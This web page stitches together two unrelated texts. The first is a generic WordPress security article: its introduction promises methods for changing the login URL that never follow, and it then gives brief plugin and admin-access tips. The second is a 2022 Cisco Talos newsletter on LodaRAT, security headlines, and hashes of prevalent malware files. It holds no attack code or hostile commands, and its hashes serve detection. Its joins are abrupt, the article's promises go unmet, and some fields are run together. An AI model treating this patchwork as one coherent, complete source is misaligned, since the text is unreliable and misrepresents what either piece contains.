There are a few reasons webmasters might want to change the default WordPress login URL. By doing so, you can help keep your site more secure from hackers and bots who try to gain access by brute force. Additionally, it can also deter casual users from trying to snoop around areas of your site they shouldn’t be.

If you’re running a membership site or online community, you may also want to change the login URL to something more branded and memorable for your users. By making it easy for them to find and login, you can reduce frustration and increase adoption.

Whatever your reason for wanting to change the WordPress login URL, it’s actually quite easy to do. There are a few different methods you can use, including plugins and editing code directly.

**Login Limit Plugin**

As a website owner, it’s important to make sure that your site is secure. One way to do this is by using a WordPress login limit plugin. This type of plugin will help to protect your site by limiting the number of failed login attempts.

There are many benefits of using a WordPress login limit plugin. By limiting the number of failed login attempts, you can help to prevent hackers from gaining access to your site. Additionally, this plugin can also help to improve the security of your password.

If you’re looking for a way to improve the security of your website, then we recommend that you consider using a WordPress login limit plugin.

**Security Plugins**

Using a security plugin is a must. There are many security plugins available for WordPress, but not all of them are created equal. Do some research and find a plugin that suits your needs. (We recommend looking into Wordfence or Sucuri.)

Once you’ve found a plugin, install it and activate it. Follow the instructions on the plugin’s settings page to configure it properly.

Most security plugins will offer features like blocking IP addresses, two-factor authentication, malware scanning, and more. Choose the features that are most important to you and make sure they’re enabled.

Keep your security plugin up to date by installing new versions when they’re released.

**Sharing Admin Access**

If you’re planning on giving someone else access to your WordPress admin panel, there are a few security precautions you should take first.

For starters, be sure to create a separate user account for the person to whom you’re granting access. That way, if their account is ever compromised, your main admin account will remain safe.

Next, be sure to set strong passwords for both your main admin account and the new user account. Use a combination of letters, numbers, and symbols to make it as difficult as possible for hackers to guess.

**Take Away**

Malicious actors are continuously coming up with new ways to use a company’s online presence against them, while cyber security specialists are always coming up with new ways to resist them.

This is the never-ending cycle of cybersecurity, and we’re all trapped in its center. Your WordPress site is just like any other website on the internet when it comes to cyber-attacks. However, by following the above-recommended tips and hacks, you can secure your WordPress website from cyber criminals or at least reduce the risk of being attacked. 

1.  What is WooCommerce, and Why You Should Care
2.  Tips for Using Uploader Widgets on WordPress Blogs
3.  5 WordPress Security Solutions with Free SSL Certificates
4.  Flaws in 2 famous WordPress plugins put millions of sites at risk
5.  WordPress GDPR Compliance plugin hacked to spread backdoor

Step-by-Step Security Guide for WordPress

The Snort 2023 calendar is finally here, and y’all, it’s a good one. Packed full of classic memes and punny Snorties, the calendar is sure to delight all year long.

Thursday, November 17, 2022 14:11

Welcome to this week’s edition of the Threat Source newsletter.

It's everyone’s favorite time of year again and no, I don’t mean the impending holidays. The Snort 2023 calendar is finally here, and y’all, it’s a good one. Packed full of classic memes and punny Snorties, the calendar is sure to delight all year long. The Talos creative team really knocked it out of the park with these original designs. I won’t spoil the whole calendar and reveal too much, but I’ve shared a favorite below...

Want a copy? NEED a copy? Simply fill out our short survey here. Calendars will begin shipping after December 1, 2022. U.S. shipping only, available while supplies last.

**The one big thing**

_Contributed by Chris Neal_

This week Cisco Talos has published a blog detailing new variants and versions of LodaRAT, a remote access tool and stealer written in the AutoIt scripting language. Additionally, we identified several instances where LodaRAT was deployed alongside more advanced malware, including RedLine, Neshta and a VenomRAT clone known as S500.

**Why do I care?**

These new iterations and the pairing with other malware families represent a growth phase for LodaRAT throughout 2022. Many of the variations we observed added functionality to LodaRAT, making it a more capable malware; including one notable variant that copies LodaRAT to all attached removable storage for proliferation. These changes signal that more advanced variants will likely appear in the threat landscape in the future.

**So now what?**

Cisco Talos will continue its research into LodaRAT and provide coverage for future variants. We have also provided full Snort and ClamAV coverage for all samples observed during this research. As always, Cisco Talos recommends ensuring all products are updated to the most recent version, as well as maintaining a thorough standardized security posture.

**Top security headlines of the week**

Australia takes an offensive approach after two high-profile cyber-attacks targeting Australian telecommunications company Optus and insurance provider Medibank.  Cybersecurity Minister Clare O’Neil has vowed to “hack the hackers” as the country establishes a permanent task force. O’Neil stated, “The joint standing operation will not simply respond to crimes as they affect Australians; they will be hunting these gangs around the world and disrupting the actives of these people.” (itnews)

If you’ve yet to hit it big will Mega Millions, give bug bounties a try. One lucky security researcher found an “accidental” security bug but came away $70,000 richer. Privately reported, the bug allowed anyone to unlock Google Pixel phones without knowing the passcode. Tracked as CVE-2022-20465, the bypass allows for users to access the devices data without ever having to enter the passcode through the lock screen. (TechCrunch)

Consistent with cybersecurity trends this year, Education continues to be a top target of ransomware. The education space creates an ideal context for high impact lures with time pressure built in, like back-to-school time and student loan deadlines and information. “Impacts have ranged from restricted access to the network, delayed exams, canceled school days, to unauthorized access to personal information regarding students and staff,” Jen Easterly, director of Cybersecurity and Infrastructure Security Agency, shared during the CISA national summit on k-12 school safety and security. Just prior to the summit, The Center for Internet Security released a report citing sector-wide cyber maturity concerns with 81% of schools not implementing multi-factor authentication. However, 83% of schools hold cyber insurance, a topic Talos’ own Martin Lee just wrote on. (SC Media)

**Can’t get enough Talos?**

*   Vulnerability Spotlight: Microsoft Office class attribute double-free vulnerability
*   Ransomware: Why do businesses still pay up?
*   Cyber insurance: The good, the bad and the ugly

**Upcoming events where you can find Talos**

SIS(Security Intelligence Summit), 2022.ON (Nov. 29)  
Josun Palace, Seoul

AVAR (Association of Anti-Virus Asia Researchers), 2022.ON (Dec. 1-2)  
Carlton Hotel, Singapore

CactusCon (Jan 27-28)  
Mesa, AZ

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256: 1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
VirusTotal: https://www.virustotal.com/gui/file/1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d/details  
Typical Filename: Iris QuickLinks.exe  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Worm.Generic.914973

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
VirusTotal: https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details  
Typical Filename: Wextract  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

SHA 256: 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
VirusTotal: https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details  
Typical Filename: LwssPlayer  
Claimed Product: N/A  
Detection Name: Auto.125E12.241442.in02

SHA 256: 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
MD5: d47fa115154927113b05bd3c8a308201  
VirusTotal: https://www.virustotal.com/gui/file/00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
Typical Filename: outlook.exeClaimed  
Claimed Product: MS OutlookDetection  
Detection Name: W32.00AB15B194-95.SBX.TG

Tag

#google